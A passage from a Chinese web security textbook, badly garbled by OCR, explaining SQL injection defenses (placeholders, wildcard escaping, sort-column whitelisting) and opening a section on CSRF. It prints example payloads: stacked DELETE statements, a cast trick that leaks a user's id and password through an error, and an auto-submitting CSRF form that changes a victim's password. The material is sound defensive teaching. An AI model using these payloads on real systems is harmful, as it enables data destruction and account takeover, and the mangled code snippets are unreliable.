字符 捉 字面 被 排除 出 字符 趾 字 面 
























































1111;DELETE FROM BOOKS--' '1';DELETE FROM BOOKS-- ' 





令 针 对 数值 的 SQL 注入 攻击 

前 面 介绍 了 针对 字符 串 字 面 量 的 SQL 注入 攻击 ， 而 数值 字面 量 也 会 遭受 SQL 注入 攻击 。 
Web 开发 中 普遍 使 用 的 脚本 语言 (PHP、Perl、Ruby 等 ) 多 为 动态 类 型 语言 ， 不 限制 变量 的 类 
型 。 因 此 ， 理 应 填 入 数值 的 地 方 就 有 可 能 会 被 填 入 其 他 类 型 的 字符 。 比 如 ,假设 以 下 SQL 语句 
中 age 列 的 类 型 为 整数 型 ， 存 储 的 是 职员 的 年 龄 。 





























SELECT * FROM employees WHERE age < $age 





这 时 ， 如 果 将 以 下 字符 串 传 人 $age， 就 形成 了 SQL 注入 攻击 。 





1;DELETE FROM employees 





拼接 后 的 SQL 语句 如 下 。 








SELECT * FROM employees WHERE age < 1;DELETE FROM employees 











而 一 旦 执行 此 SQL 语句 就 会 删除 所 有 的 职员 信息 。 

由 于 数值 字面 量 没 有 用 单 引号 围 住 ， 所 以 ， 当 出 现 非 数 值 的 字符 时 即 被 视 为 数值 字面 量 终 
止 。 此 例 中 ， 分 号 ; 不 是 数值 ， 因 此 分 号 以 后 的 值 就 被 排除 出 了 数值 字面 量 ， 而 被 解释 为 SQL 
语句 的 一 部 分 。 

对 策 0 

前 面 已 经 提 到 ， 产 生 SQL 注入 漏洞 的 根本 原因 为 ， 被 指定 为 参数 的 字符 串 的 一 部 分 被 排除 
出 字面 量 ， 导 致 SQL 语句 发 生 了 变化 。 因 此 ， 要 防范 SQL 注入 漏洞 ， 就 必须 防止 SQL 语句 在 
拼接 过 程 中 被 更 改 。 有 具体 可 采取 如 下 两 种 方法 。 

(a ) 使 用 占 位 符 拼 接 SQL 语句 

(b ) 在 应 用 程序 中 拼接 SQL 语句 时 ， 要 确保 字面 量 被 正确 处 理 ，SQL 语句 不 被 更 改 

由 于 (b ) 方 法 的 实施 非常 困难 ， 因 此 这 里 极力 推荐 采用 (a ) 方 法”。 











@ 关于 SQL 中 字面 量 的 正确 构成 方法 ， 请 参考 独立 行政 法 人 信息 处 理 推进 机 构 (IPA ) 发 表 的 《安全 调用 SQL 的 方法 》[5]。 
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令 使 用 占 位 符 拼接 SQL 语句 
使 用 了 占 位 符 后 ， 之 前 检索 图 书库 存 的 SQL 语句 就 可 以 记述 如 下 。 





SELECT * FROM books WHERE author = ? ORDER BY id 











SQL 语句 中 的 问号 就 是 占 位 符 ， 表 示 将 变量 或 表达 式 等 可 变 参数 填 到 此 处 。 占 位 符 ( Place 
Holder ) 的 英文 即 为 “ 占 座 ” 的 意思 。 下 面 我 们 就 来 演示 一 下 如 何 使 用 占 位 符 修改 上 述 含有 漏洞 
的 范例 。 这 里 使 用 了 名 为 MDB2 的 调用 SQL 语句 的 程序 库 。 


代码 清单 ”/44/44-004.php 





<?php 
require once 'MDB2.php'; 
header ('Content-Type: text/html; charset=UTF-8'); 
$author = $ GET['author']; 
// 连接 数据 库 时 指定 字符 编码 为 UTF-8 
$mdb2 = MDB2::connect ('pgsql://wasbook:wasbook@localhost/wasbook? 








charset=utf8'); 
$sql = "SELECT * FROM books WHERE author = ? ORDER BY id"; 
// 准备 调用 SQL。 在 第 2 个 参数 数组 中 指定 占 位 符 的 类 型 
$stmt = $mdb2->prepare($sql, array('text')); 
// 执行 SQL 语句 。execute 方法 的 参数 为 参数 的 实际 值 ( 绑 定 值 ) 
Srs = $stmt->execute (array ($author)); 
// 省 略 显示 的 部 分 。 
$mdb2->disconnect () ; // 切断 数据 库 连 接 


3 






























































在 上 述 脚 本 中 ，author = ? 部 分 使 用 了 占 位 符 。 此 外 ， 在 调用 execute 方法 时 指定 了 实 
际 的 参数 值 。 而 将 值 分 配给 占 位 符 这 一 操作 就 被 称 为 绑 定 变量 。 


专栏 : 采用 MDB2 的 原因 COLUMN 


PHP 中 连接 MySQL 或 PostgreSQL 等 数据 库 引擎 的 程序 库 种 类 繁多 ， 而 笔者 在 试用 了 很 多 程序 
库 后 发 现 ，PEAR 类 库 中 的 MDB2 的 安全 性 最 好 。 原 因 如 下 ( 调查 时 间 为 2010 年 12 月) 
























































MDB2 连接 数据 库 时 能 够 方便 地 指定 字符 编码 。PDO 等 其 他 程序 库 指 定 文字 编码 非常 不 便 
提供 有 占 位 符 和 转 义 等 直接 关系 到 安全 性 的 功能 
被 PEAR 合并 的 其 他 程序 库 ( 例如 DB ) 都 已 停止 后 续 维 护 





























为 什么 使 用 占 位 符 会 安全 
占 位 符 依据 实现 方法 可 分 为 静态 占 位 符 和 动态 占 位 符 两 类 。 下 面 我 们 就 来 看 一 下 为 什么 使 用 
占 位 符 能 够 安全 地 调用 SQL 语句 。 
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静态 占 位 符 ”的 绑 定 变量 操作 在 数据 库 引擎 中 执行 。 含 有 占 位 符 的 SQL 语句 被 直接 发 送 至 数 
据 库 引擎 ， 数 据 库 引擎 执行 编译 等 准备 工作 后 确定 SQL 语句 。 随 后 绑 定 值 也 被 发 送 至 数据 库 引 
擎 ,数据 库 引擎 将 收 到 的 值 填充 进 SQL 语句 后 将 其 执行 (图 4-39 )。 
































图 4-39 静态 占 位 符 
Web 应 数据 库 
SELECT * FROM users 








SELECT * FROM users 
WHERE idq=@ and pwd=4 WHERE id=®@ and pwd=4 




















全 
编译 SQL 语句 


管 









































一 -一 @=sato ^=5alz 一 一 一 一 一 了 | @@=sato ^=5al!z | 变量 绑 定 
执行 SQL 语句 v 
= SELECT * FROM users 
行 疆 
执行 结果 WHERE id='sato' and pwd='5al!z! 























E 论 上 来 说 ， 之 后 SQL 语句 就 




















由 于 SQL 语句 是 在 包含 占 位 符 的 状态 下 被 编译 的 ， 因 此 ， 从 到 
不 可 能 再 被 改变 。 




















今 动态 占 位 符 
动态 占 位 符 的 方式 为 ， 首 先 在 处 理 SQL 的 程序 库 中 执行 绑 定 变量 操作 ， 然 后 再 将 SQL 语句 
发 送 给 数据 库 引擎 处 理 。 绑 定 变 量 时 字面 量 会 被 妥善 处 理 ， 因 此 只 要 处 理 中 没有 Bug 就 不 会 遭 
受 SQL 注入 攻击 (图 4-40 )。 


4-40 动态 占 位 符 































































































Web 应 数据 库 
SELECT * FROM users 
WHERE id=®@ and Pwd=^ 
@=sato 4=5a!z | 在 程序 库 内 绑 定 变量 
SELECT * FROM users SELECT * FROM users 
WHERE id='sato' and pwd='5al!lz' WHERE id='sato' and pwd='5al!z' 
v 
< 执行 结果 编译 并 执行 SQL 语句 



































由 此 可 见 ， 无论 使 用 静态 还 是 动态 占 位 符 都 能 消除 SQL 注入 漏洞 。 但 就 理论 上 来 说 ， 毅 态 
占 位 符 能 够 完全 消除 SQL 注入 漏洞 出 现 的 可 能 性 ， 所 以 应 当 尽 可 能 地 采用 静态 占 位 符 。 


中 静态 占 位 符 在 ISO 或 JIS 中 ， 也 被 称 为 预 处 理 语句 ( Prepared Statement )。 
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动态 占 位 符 可 能 会 因 程 序 问题 而 造成 SQL 注入 漏洞 , 比如 JVN#59748723”。 详 情 可 参考 笔者 
的 博客 文章 [4]。 


令 参 考 : LIKE 语句 与 通配符 

使 用 LIKE 语句 进行 模糊 查询 时 由 通配符 引发 的 问题 ， 经 常 容易 与 SQL 注入 混为一谈 。 指 
定 LIKE 语句 的 查询 模式 时 ，_ 匹配 任意 1 个 字符 ，% 匹配 任意 1 个 或 多 个 字符 。_ 和 % 就 被 称 
为 通配符 。 

使 用 LIKE 语句 进行 查询 时 ， 如 果 字 符 中 含有 _ 或 %， 就 必须 对 这 些 通配符 进行 转 义 。 不 进 
行 转 义 的 话 就 会 出 现 很 多 问题 ， 但 这 并 不 是 SQL 注入 ， 而 很 多 人 却 经 常 将 两 者 混淆 。 

接 下 来 就 让 我 们 首先 通过 示例 看 一 下 LIKE 语句 的 用 法 。 下 面 是 一 条 用 来 查询 name 列 中 包 
含 “ 山 田 ” 的 行 的 语句 (部 分 匹配 )。 



































WHERE name LIKE 'g 山 田 $' 












































要 在 LIKE 语句 中 查询 _ 或 %， 就 需要 使 它们 不 再 担任 通配符 的 角色 ， 即 对 其 进行 转 义 。 转 
义 时 使 用 的 字符 应 该 使 用 ESCAPE 语句 指定 “。 下 面 的 例子 中 就 使 用 了 # 作为 转 义 字符 。 

例如 ， 下 面 是 一 条 查询 name 列 中 包含 % 的 行 的 语句 。 第 一 个 和 最 后 一 个 % 为 通配符 ，#% 
表示 查询 对 象 字符 为 %。 


























WHERE name LIKE '%#%%' ESCAPE '#' 




















虽然 转 义 通配符 与 SQL 注入 漏洞 并 无 直接 关联 ， 但 却 是 正确 处 理 所 必 需 的 步 又。 
转 义 通配符 的 PHP 函数 示例 如 下 所 示 。 它 适用 于 PostgreSQL 和 MySQL。 前 提 为 PHP 的 内 
部 字符 编码 设置 无 误 。 























function escape wildcard(Ss) { 
return mb ereg replace('([ %#])', '#\1', $s); 


} 











其 他 数据 库 引擎 中 需要 转 义 的 字符 则 略 有 不 同 ， 如 下 表 所 示 。 





QD 详情 可 参考 http:Wjvn.jp/emjp/JVN59748723/ 
@ MySQL 中 可 以 不 写 ESCAPE 语句 而 使 用 \ 来 转 义 字符 。 但 由 于 SQL 标准 规格 (ISO 及 JIS ) 中 规定 没有 ESCAPE 语 
名 时 就 认为 没有 定义 转 义 字符 ， 因 此 ， 按 照 这 一 标准 ， 始 终 使 用 ESCAPE 语句 来 定义 转 义 字符 更 为 保险 。 
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表 4-10 需要 转 义 的 通配符 
数据 库 转 义 对 象 字符 补充 说 明 
MySOL _% 
PostgreSQL _% 
Oracle _%_% 全 角 字 符 也 需 转 义 
MS SOL Server rl 见 ※1 
IBM DB2 _%_% 全 角 字 符 也 需 转 义 
※1 ”MS SQL Server 中 能 够 使 用 [a-z] 这 种 类 似 于 正则 表达 式 的 通配符 。[a-z] 匹配 1 个 小 写字 母 。 因 此 ， 要 查询 [ 本 身 就 必须 将 [ 转 义 。 
参考 : httpWmsdn.microsoft.com/zh-cmlibraryms179859.aspx 
调查 时 上 述 数据 库 的 版 本 如 下 。 
表 4-11 调查 时 使 用 的 数据 库 版 本 
数据 库 版 本 参考 网 页 
MySQL 55 http://dev.mysql.com/doc/refman/5.5/en/string—~comparison—functions. 
html#operator_like 
PostgreSQL 9.0.2 http://www.postgresql.jp/document/pg902doc/html/functions—matching. 
html#FUNCTIONS-LIKE 
Oracle ※2 11g http://download.oracle.com/docs/cd/E16338_01/server.112/b56299/ 


conditions007.htm#i1034153 





MS SOL Server 


SOL Server 2008 R2 


http://msdn.microsoft.com/ja—jp/library/ms179859.aspx 





IBM DB2 








9.7 


http://publib.boulder.ibm.com/infocenter/db2luw/v9r7/index.jsp?topic=/ 
com.ibm.db2.luw.sql.ref.doc/doc/r0000751.html 








※2 ” Oracle 11g 的 参考 网 页 中 没有 提 及 全 角 

















(使 











令 使 用 占 位 符 的 各 种 处 理 


在 实际 的 Web 应 用 开发 中 遇 到 条 件 复杂 的 SQL 语句 时 , 很 多 人 可 
的 方式 来 组 装 SQL 语句 的 想法 ， 因 为 他 们 觉得 使 用 占 位 符 无 法 写 出 复 


通配符 ， 但 根据 实际 操作 我 们 发 现 ， 全 
Oracle Database 11g Enterprise Edition Release 11.1.0.6.0 验证 ) 














通配符 也 需要 进行 转 义 。 








能 都 会 萌发 用 拼接 字符 串 
杂 的 SQL 语句 。 鉴 于 这 种 





情况 ， 接 下 来 我 们 就 向 大 家 介绍 一 下 各 种 复杂 情况 下 使 用 占 位 符 来 调用 SQL 语句 的 例子 。 


今 查询 条 件 发 生动 态 变 
Web 应 用 的 查询 页 面 中 有 时 会 提供 多 个 查询 条 件 ， 在 这 样 的 页 面 中 ，SQL 语句 只 在 有 输入 
内 容 的 文本 框 中 组 装 ， 所 以 SQL 语句 就 会 根据 用 户 的 输入 情况 而 发 生变 化 。 





这 种 情况 下 ， 


的 页 面 输入 值 。 

















可 以 使 用 字符 串 动 态 拼接 含有 占 位 符 ? 的 SQL 语句 ， 等 到 调用 SQL 语句 时 才 
绑 定 参数 。 示 例 脚本 如 下 。 在 这 段 脚 本 中 , PHP 变量 $title 和 $price 分 别 为 书 名 和 价格 上 限 
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// 基底 SQL 语句 


$sql = 'SELECT id, title, author, publisher, date, price FROM books'; 
if ($title !== '') { // 添加 title 查询 条 件 ( LIKE ) 
$sconditions[] = "title LIKE ? ESCAPE '#'"; 
sph typel] = text'’; 
$ph value[] = escape wildcard ($title); 
} 
if ($price !== '') { // 添加 price 查询 条 件 ( 大 小 比较 ) 
seonditionsl] se price < 2 
sph typell] 三 "integer’; 
$sph value[] = $price; 


} 
if (count ($conditions) > 0) { // 存在 WHERE 语句 时 
$sql .= ' WHERE ' . implode(' AND ', $conditions); 
} 
$stmt = $mdb2->prepare ($sql，$ph_ type) ; // 准备 SQL 语句 
Srs = $stmt->execute($ph value); // 执行 变量 绑 定 和 查询 操作 

















虽然 本 例 中 指定 的 查询 条 件 最 多 只 有 2 个 ， 但 更 复杂 的 查询 条 件 语句 也 能 够 通过 同样 的 方法 
使 用 占 位 符 拼接 而 成 。 


人 各 种 列 的 排序 

为 了 方便 用 户 浏 览 列表 ， 有 时 需要 将 SQL 语句 的 查询 结果 根据 用 户 指定 的 列 进行 排序 。 
SQL 中 能 够 使 用 ORDER BY 语句 指定 列 并 进行 排序 ， 但 编程 时 稍 有 玻 包 就 会 引入 安全 隐患 。 比 
如 ， 假 设 脚本 中 有 如 下 SQL 语句 ， 其 中 ， 指 定 列 名 的 $row 通过 查询 字符 串 等 外 部 途径 传人 。 
如 果 指 定 row=author， 就 会 按照 作者 名 进行 排序 。 





SELECT * FROM books ORDER BY $row 











而 如 果 $row 被 指定 为 如 下 值 ， 就 形成 了 SQL 注入 攻击 。 





cast ((select id||':'||pwd FROM users limit 1) as integer) 





此 时 展开 后 的 SQL 语句 如 下 所 示 。 





SELECT * FROM books ORDER BY cast((select id||':'||pwd FROM users limit 1) as 
integer) 

















ERROR: integer 类 型 的 输入 语法 无 效 : "yamada:passil" 



































另外 ， 还 可 以 在 ORDER BY 语句 后 插入 分 号 并 追加 其 他 SQL 语句 (UPDATE 等 )。 

下 面 就 让 我 们 来 看 一 下 该 问题 的 防范 策略 ， 即 检验 排序 列 名 的 有 效 性 的 方法 。 

假设 在 以 下 脚本 中 ， 由 查询 字符 串 sort 来 指定 进行 排序 的 列 。 数 组 Ssort_columns 为 允 
许 指定 的 排序 列 名 。 这 里 使 用 array_search 函数 检查 外 界 传人 的 列 名 是 否 合法 ， 合 法 的 情况 
下 才能 够 在 SQL 语句 后 面 加 上 ORDER BY 语句 。 























$sort :GOLlumns. 三 array (ld, “author", "title", “priGe); 
$sort key = $ GET['sort']; 
if (array search($sort key, $sort columns) !== false) { 
$sql .= ' ORDER BY ' . $sort key; 
} 
4 SQL 注入 的 辅助 性 对 策 








通过 上 面 的 讲述 我 们 知道 了 防范 SQL 注入 攻击 的 根本 性 对 策 为 使 用 占 位 符 。 而 这 里 我 们 将 
向 大 家 介绍 一 些 能 够 配合 占 位 符 一 起 实施 的 辅助 性 对 策 。 所 谓 辅助 性 对 策 ， 是 指 当 根本 性 对 策 的 
实施 有 玻 漏 ， 或 者 中 间 件 存在 漏洞 时 ， 能 够 减轻 攻击 造成 的 损害 的 对 策 。 


不 显示 详细 的 错误 消息 
仿 验 输入 值 的 有 效 性 
设置 数据 库 权 限 


今 不 显示 详细 的 错误 消息 

之 前 我 们 提 到 过 利用 错误 消息 来 实施 SQL 注入 攻击 ， 从 而 成 功 窥探 数据 库 中 信息 的 例子 。 
其 中 ， 特 别 是 在 显示 为 SQL 错误 的 情况 下 ，SQL 注入 漏洞 会 更 容易 暴露 给 外 界 。 因 此 ， 通 过 避 
免 显 示 详 细 的 错误 消息 ， 就 能 够 在 存在 SQL 注入 漏洞 的 情况 下 ， 使 攻击 难度 加 大 。 

PHP 中 关闭 详细 的 错误 消息 的 显示 ， 只 需 在 php.ini 中 做 如 下 设置 。 















































display errors = Off 





人 检验 输入 值 的 有 效 性 

正如 4.2 节 所 述 ， 依 据 应 用 程序 的 规格 校 验 输入 值 ， 有 时 能 够 达到 抵挡 外 部 攻击 的 效果 。 例 
如 ， 邮 编 输 入 框 仅 能 输入 数字 、 用 户 名 输入 框 仅 能 输入 字母 和 数字 等 ， 进 行 输入 校 验 后 ， 即 使 忘 
了 利用 占 位 符 ， 也 不 会 使 SQL 注入 攻击 得 运 。 

但 是 ， 仅 依靠 输入 校 验 是 无 法 杜绝 SQL 注入 攻击 的 。 因 为 像 地 址 输入 框 或 评论 输入 框 等 地 
方 就 不 限制 输入 字符 的 种 类 。 因 此 ， 对 抗 SQL 注入 攻击 还 是 要 使 用 占 位 符 。 























今 设置 数据 库 权限 
将 Web 应 用 数据 库 的 用 户 访问 权限 设置 为 所 需 的 最 低 限 度 后， 万 一 遭受 SQL 注入 攻击 ,也 
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能 将 受 损 降 到 最 低 。 
例如 ， 仅 显示 商品 信息 的 应 用 就 不 需要 用 户 对 商品 数据 表 进 行书 写 操作 。 这 种 情况 下 ， 仅 开 
放 商 品 数据 表 的 读 取 权 限 给 数据 库 用 户 ， 而 不 授予 其 书写 权限 ,就 能 防止 商品 信息 被 自 改 。 
此 外 ， 针 对 在 “其 他 攻击 ”中 提 到 的 通过 SQL 读 取 文件 这 一 攻击 类 型 ， 也 需要 设置 数据 库 
管理 员 权 限 。 将 数据 库 用 户 的 权限 设 为 所 需 的 最 低 限 度 ， 即 使 应 用 中 有 SQL 注入 漏洞 ， 也 能 将 
受害 程度 降 到 最 低 。 


























总 结 


本 节 讲 解 了 SQL 注入 漏洞 的 相关 知识 。SQL 注入 漏洞 能 导致 数据 库 内 的 所 有 信息 被 泄漏 或 
算 改 ， 从 而 造成 极 大 的 影响 。 因 此 ， 应 用 开发 者 在 编程 时 一 定 要 时 刻 警 惕 SQL 注入 漏洞 。 

防范 SQL 注入 的 最 佳 方法 为 使 用 静态 占 位 符 调 用 SQL 语句 。 由 于 即使 是 动态 的 SQL 语句 
也 能 够 设法 使 用 静态 占 位 符 来 实现 ， 因 此 ， 建 议 开 发 者 们 在 应 用 中 全 部 使 用 静态 占 位 符 。 


和 


























继续 深入 学 习 
关于 以 下 这 些 本 书 未 涉及 的 内 容 ， 读 者 们 可 以 参考 独立 行政 法 人 信息 处 理 推进 机 构 (IPA ) 
发 表 的 《安全 调用 SQL 的 方法 》[5]。 
应 进行 转 义 的 字符 详情 
字符 编码 的 影响 
而 不 同 数据 库 引 警 的 攻击 方法 的 示例 ， 在 金 床 所 车 的 《Web 应 用 安全 》[2] 或 Justin Clarke 所 
著 的 《SQL 注入 攻击 与 防御 [1] 中 有 详细 说 明 。 
此 外 ， 当 攻击 者 无 法 利用 错误 消息 或 UNION SELECT 人 窃取 内 部 信息 时 ， 还 可 以 使 用 SQL 讶 
注 攻 击 (Blind SQL Injection ) 的 手段 达到 窃取 信息 的 目的 ， 详 情 见 佐 名 木 智 贵 所 著 的 《Web 编程 
安全 性 技巧 江 3] 或 《SQL 注入 攻击 与 防御 》[1]。 











参考 : 无 法 使 用 点 位 符 时 的 对 策 
虽然 本 书 始终 推荐 使 用 占 位 符 来 应 对 SQL 注入 ， 但 是 ， 在 一 个 既 有 的 应 用 中 ， 如 果 将 实现 
方针 全 部 改 为 使 用 占 位 符 的 话 ， 修 改 成 本 将 非常 巨大 。 
这 种 情况 下 ,为 了 解决 SQL 注入 漏洞 ， 可 以 沿用 字符 串 拼 接 SQL 语句 的 方法 ， 并 将 重点 注 
目 于 字面 量 的 正确 处 理 上 。 具 体 来 说 应 实施 以 下 两 点 。 
将 字符 串 字面 量 中 有 特殊 意义 的 字符 和 符号 进行 转 义 
确保 数值 字面 量 中 不 被 混入 数值 以 外 的 字符 
有 些 调用 SQL 的 程序 库 中 提供 了 quote 方法 来 转 义 SQL 中 的 字符 串 字面 量 ， 





够 根据 


[Cs 
IO》 
CC 
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数据 库 的 种 类 和 设置 等 自行 调整 转 义 的 字符 。 

数值 字面 量 的 情况 下 一 般 只 需 将 值 转换 ( Cast ) 为 数值 型 即 可 ， 但 是 ， 像 位 数 很 多 的 十 进 制 
数 等 在 一 些 编程 语言 中 就 没有 对 应 的 类 型 ， 这 时 就 不 能 使 用 类 型 转换 ， 而 应 使 用 正则 表达 式 来 检 
验 数 值 。 

详情 请 参考 独立 行政 法 人 信息 处 理 推进 机 构 ( IPA ) 发 表 的 《安全 调用 SQL 的 方法 》[5]。 


参考 : Perl+MySQL 的 安全 连接 方法 

Perl 和 MySQL 的 组 合 有 着 很 高 的 人 气 。 但 由 于 Perl 的 标准 库 中 的 SQL 连接 库 DBI/DBD 连 
接 MySQL 时 默认 使 用 动态 占 位 符 ， 因 此 ， 要 想 改 为 使 用 静态 占 位 符 的 话 ， 就 需要 修改 如 下 设置 
(阴影 部 分 )。 



































my $db = DBI->connect ('DBI:mysql:books:localhost,; 
mysql server prepare=1;mysql enable utf8=1', 'username', 'password') || aie 
$DBI::errstr; 











参考 : PHP+PDO+MySQL 的 安全 连接 方法 

在 使 用 PHP 的 开发 中 ， 连 接 MySQL 数据 库 通常 会 采用 PDO (PHP Data Objects )。PDO 
处 理 速度 快 而 备 受 欢迎 ,但 使 用 时 需 注意 防范 SQL 注入 漏洞 。 

PDO 没有 提供 指定 连接 数据 库 时 的 字符 编码 的 方法 ， 只 能 通过 指定 MySQL 的 配置 文件 的 方 
式 来 指定 字符 编码 ， 如 下 所 示 。 下 面 的 代码 中 还 设置 了 使 用 静态 占 位 符 。 











$dbh = new PDO('mysgql:host=localhost;dbname=wasbook', 
'uUsername', 'password', array( 
PDO: :MYSQL ATTR READ DEFAULT FILE => '/etc/mysql/my.cnf', 
PDO: :MYSQL ATTR READ DEFAULT GROUP => 'client', 
PDO: :ATTR EMULATE PREPARES => false, 









































另外 ， 在 /etc/mysql/my.cnf ( MySQL 的 配置 文件 ) 中 添加 如 下 设置 。 





[client] 








default-character-set=utf8 





参考 : Java+MySQL 的 安全 连接 方法 
Java 连接 MySQL 时 使 用 JDBC 驱动 的 MySQL ConnectorJ。 由 于 这 一 组 合 默认 使 用 的 是 动 
态 占 位 符 ， 因 此 ， 建 议 修改 如 下 设置 (阴影 部 分 ) 以 改 为 使 用 静态 占 位 符 。 
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Connection con = DriverManager.getConnection( 
"jdbc:mysql://localhost/dbname?user=xxx&password=xxxx& 
useServerPprepStmts=true&useUnicode=true&characterEncoding=utf8") 
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4.5 ”关键 处 理 中 引入 的 安全 隐患 


Web 应 用 中 ， 用 户 登 录 后 执行 的 操作 中 有 些 处 理 一 旦 完成 就 无 法 撤销 ， 本 书 将 此 类 处 理 称 为 
“关键 处 理 ”""。 像 用 户 使 用 信用 卡 支付 、 从 用 户 的 银行 账号 转账 、 发 送 邮件 、 更 改 密码 或 邮箱 地 址 
等 都 是 关键 处 理 的 典型 案例 。 

关键 处 理 中 如 果 存 在 安全 隐患 ， 就 会 产生 名 为 跨 站 请 求 伪 造 ( Cross-Site Request Forgeries， 
简称 CSRF ) 的 漏洞 。 接 下 来 ， 本 节 就 将 对 CSRF 漏洞 进行 详细 的 说 明 。 


























4.5.1 ” 跨 站 请 求 伪 造 ( CSRF ) 


概要 
在 执行 关键 处 理 前 ， 需 要 确认 该 请 求 是 否 确实 由 用 户 自 愿 发 起 。 如 果 忽 略 了 这 个 确认 步骤 ， 
就 可 能 出 现 很 大 问题 ， 比 如 用 户 只 是 浏览 了 恶意 网 站 ,浏览 器 就 近 自 执行 关键 处 理 等 。 
引发 上 述 问 题 的 安全 隐患 被 称 为 跨 站 请 求 伪 造 (CSRF ) 漏洞 ， 而 针对 CSRF 漏洞 进行 的 攻 
击 就 是 CSRF 攻击 。 
Web 应 用 存在 CSRF 漏洞 时 就 可 能 会 遭受 如 下 攻击 。 


使 用 用 户 的 账号 购物 
删除 用 户 账号 

使 用 用 户 的 账号 发 布 帖子 

更 改 用 户 的 密码 或 邮箱 地 址 等 


CSRF 漏洞 造成 的 影响 仅 限 于 应 用 的 关键 处 理 被 恶意 使 用 ， 而 像 用 户 的 个 人 信息 等 就 无 法 通 
过 CSRF 攻击 窃取 ?。 

因此 ， 为 了 预防 CSRF 漏洞 ， 就 需要 在 执行 关键 处 理 前 确认 请 求 确实 是 由 用 户 自 愿 发 起 的 。 
详情 请 参考 本 节 的 “对 策 ”。 







































































( 有 些 文献 也 把 关键 处 理 用 于 表示 特定 的 副作用 。 
@ 但 是 ,一 旦 攻击 者 修改 了 用 户 的 密码 ， 就 有 可 能 窃取 该 用 户 的 个 人 信息 。 


产生 地 点 
以 下 任 一 网 站 上 执行 关键 处 理 的 页 面 
e 仅 使 用 Cookie 进行 会 话 管理 的 网 站 
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。 仅 依靠 HTTP 认证 、SSL 客户 端 证 书 、 手 机 的 移动 ID 来 识别 用 户 的 网 站 


影响 范围 
存在 CSRF 漏洞 的 页 











由 














影响 类 型 
4 以 受害 用 户 的 权限 执行 关键 处 理 。 如 购买 商品 、 发 布 帖子 、 更 改 密码 等 


























办 二 2 Ee 


用 户 参 与 程度 


需要 一 点 击 恶 意 连接 、 浏 览 恶 意 网 站 等 
































由 对策 概要 
一 一 执行 关键 处 理 前 ， 确 认 是 正规 用 户 发 起 的 请 求 








攻击 手段 与 影响 
首先 让 我 们 来 看 一 下 针对 CSRF 漏洞 实施 的 两 种 典 














型 的 攻击 模式 。 即 “输入 -执行 ”这 种 简 


单 模式 下 的 攻击 手段 以 及 中 途 包含 确认 页 面 时 的 攻击 方法 。 


“输入 -执行 ”模式 的 CSRF 攻击 


此 处 用 更 改 密码 页 面 作为 “输入 - 执行 ”模式 下 关键 处 理 的 例子 。 以 下 PHP 脚本 展示 了 更 


改 密码 处 理 的 概要 。 
代码 清单 ”/45/45-001.php ( 登录 脚本 ) 


























<?php // 用 来 确认 用 户 已 登录 的 脚本 
session start(); 
$id = @$ GET['id']; 

















if (! $id) $id = 'yamada'; 
$_SESSION['id'] = $igd; 

2 

<body> 


已 登录 (id:<?php echo 








<a href="45-002.php"> 更 改 密码 </a> 
</body> 





htmlspecialchars ($id, ENT NOQUOTES, 'UTF-8'); ?> 


} bE 
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代码 清单 ”、/45/45-002.php ( 密码 输入 页 面 ) 





<?php 
session start(); 
// 确认 登录 省 略 
RS 
<body> 
<form action="45-003.php" method="POST"> 
新 密码 <input name="pwd" type="password"><br> 
<input type="submit" value=" 更 改 密码 "> 





</form> 
</body> 





代码 清单 ”、/45/45-003.php ( 执行 更 改 密码 ) 





<?php 











function ex($s) { // 用 于 防范 XSS 的 HTML 转 义 及 显示 处 理 
echo htmlspecialchars ($s, ENT COMPAT, 'UTF-8'); 

} 

session start(); 

$id = $_ SESSION['id']; // 取得 用 户 名 

// 确认 登录 省 略 

$Spwd = $_POST['pwd'];  ”// 取得 密码 

// 更 改 密码 处 理 将 用 户 $id 的 密码 更 改 为 $pwd 

































































?3 
<body> 
<?php ex($id) ; ?> OO 的 密码 已 更 改 为 AA 
</body> 














这 些 脚本 的 运行 示例 如 图 4-41 所 示 。 


4-41 脚本 运行 示例 


mp//eemplejp/a/ 5 O01 Php Wndows ALEIG ZE 
























































OD 口 - [@ hapy/examplejp/as/45-00Lphp “| |X || sing Pp"| 
帘 收 BB 夫 | 外 http//examplejp/45/45-001.php | IR(O) ~ 
登录 成 功 (idyamada) 
更 改 密码 
L 7 中 
[年 htp//eemplejp/45/45-002php - Windows Intemet Eplorer ESG 3 
GO- | 回 httpy//examplejp/45/45-003.php ~| |X || sing Pp"| 
资 收 京 夫 “| 赔 htpy/examplejp145145-002.php 工 R) > 








新 密码 ssees 












y 


[入 htp//exemplejp/45/45.003.php - Windows Intemet Eplorer (S| 有 
GO © | http//examplejp/45/45-003.php | 3 | x ||S sing P -| 


帘 必 芒 夫 | 悦 htpy/examplejp/45/45-003.php | 工具 O) ~ 

















yamada 的 密码 已 更 改 为 pass1 
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可 见 ， 密 码 在 最 后 的 45-003.php 中 被 更 改 。 然 而 ， 通 过 此 脚本 更 改 密码 ， 还 需要 满足 以 下 3 
个 条 件 。 
使 用 POST 方法 请 求 45-003.php 
使 用 POST 参数 中 的 pwa 指定 新 密码 











而 使 浏览 器 发 送 满足 以 上 条 件 的 请 求 的 攻击 即 为 CSRF 攻击 。 下 面 就 是 用 来 实施 CSRF 攻击 
的 HTML 文件。 


代码 清单 ”/45/45-900.html 





<body onload="document .forms [0] .submit ()" 


<form action="http://example.jp/45/45-003.php" method="POST"> 
<input type="hidden" name="pwd" value="cracked"> 
</form> 


</body> 











这 段 代 码 为 实施 CSRF 攻击 的 恶意 网 页 的 HTML 源 代码 。 攻 击 者 将 其 置 于 互联 网 上 ， 并 在 
其 中 添加 攻击 对 象 网 站 用 户 可 能 感 兴趣 的 内 容 ， 以 引诱 网 站 的 用 户 前 来 浏览 
用 户 浏览 此 HTML 时 的 情形 如 图 4-42 所 示 。 


4-42 通过 CSRF 攻击 变更 密码 


| 四 设置 圈套 | 


脚本 进行 攻击 



































(3) 向 攻击 对 象 服务 器 发 送 POST 请 求 
※ 发 送 时 附带 含有 会 话 ID 的 Cookie 信息 








攻击 对 象 网 站 


外 . 
a, http://example.jp 
DDT 


8 


和 
他 倒 人生 生生 
(0 登录 example.jp “sa 


用 户 登录 example.jp 
中 攻击 者 设 下 圈套 
加 受害 人 浏览 恶 人 


@ 攻 击 者 使 用 恶意 网 站 中 的 JavaScript， 使 受害 人 的 浏览 器 向 攻击 对 象 网 站 发 送 将 密码 变更 为 cracked 的 POST 请 求 
轩 密 加 被 更 改 


人 密码 被 更 改 




















这 种 情况 下 ， 因 为 先前 列举 的 变更 密码 所 需 条 件 都 已 满足 ， 所 以 正规 用 户 的 密码 就 被 成 功 更 
